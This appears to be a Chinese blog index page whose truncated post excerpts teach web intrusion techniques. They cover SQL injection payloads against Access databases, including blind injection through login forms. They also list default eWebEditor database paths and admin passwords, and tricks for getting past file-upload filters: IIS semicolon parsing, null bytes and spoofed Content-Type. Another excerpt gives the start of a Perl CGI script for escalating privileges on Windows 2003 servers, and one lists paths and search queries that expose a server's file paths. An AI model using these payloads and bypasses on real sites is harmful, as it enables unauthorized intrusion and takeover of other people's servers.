摘要:
windows 2003 下,安装ActivePerl-5.16.2.1602-MSWin32-x86-296513IIS 添加CGI支持。并在对应网站配置下面,添加CGI后缀或PL后缀 与 对应的perlis.dll此时,网站支持HTTP访问CGI 或者 .pl脚本。可以用来提取,.CGI .PL权限比较大,大于ASPX。首先上传CGI 提权执行脚本:#!/usr/bin/perlbinmode(STDOUT);syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);$_ = $ENV{QUERY_STRING};s 阅读全文
摘要:
ACCESS的注入,基本是死的。思路很简单,基本都可以工具解决。上代码:1、判断有无注入点' and 1=1 and 1=22、猜表一般的表的名称无非是admin adminuser user pass password and 0(select count(*) from *) and exists (select * from admin)and 0(select count(*) from admin)3、爆破帐号数目 如果遇到00)--and 1=(select count(*) from admin where len(username)>0)and 1=(select 阅读全文
摘要:
ewebeditor默认数据库路径:[PATH]/db/ewebeditor.mdb [PATH]/db/db.mdb [PATH]/db/%23ewebeditor.mdb默认密码:admin/admin888 或 admin/admin 进入后台,也可尝试 admin/123456/admin888系统默认:ewebeditor.asp?id=content1&style=standard样式调用 eWebEditor.asp?id=45&style=standard1查看版本:edit/dialog/about.htmlewebeditor/d... 阅读全文
摘要:
抓包修改数据为:IIS忽略冒号后面格式 cs.asp:.jpg火狐FIREBUG修改本地JSupfile/upfile_other.asp upfile_photo.asp upfile_flash.aspasa cer asaspp隐藏表单,hidden修改数据,file00 1.asp;.jpg十六进制00: 1.asp双文件上传文件名大小写突破,对于LINUX等非WINDOWS系统asp空格asp./xx.jpg%00.phpcecerr aasasaContent-Type: image/gif (原为 Content-Type: text/plain)上传一个shtml文件, 内容为 阅读全文
该文被密码保护。 阅读全文
摘要:
另类登录注入形式:经常有一类验证(ASP,PHP,JSP均存在),先判断user是否存在,ASP为例子:"select password from admin where user_name='"&request("user_name")&"'";然后再判断密码MD5与之对比。猜解思路可以构造,user_name: xxx' and password>'a 如果password第一位大于a,则继续user_name: xxx' and password>'b. 阅读全文
摘要:
通用:Site:xxx. warningSite:xxx. “fatal error”test.phpphpinfo.php1.phpDZ曝路径:/source/function/function_connect.php/source/plugin/myrepeats/table/table_myrepeats.phpucenter\control \admin\db.phpuc_server\control \admin\db.phpWP 爆路径:wp-admin/includes/admin.phpwp-admin/includes/file.phpwp-content/themes/.. 阅读全文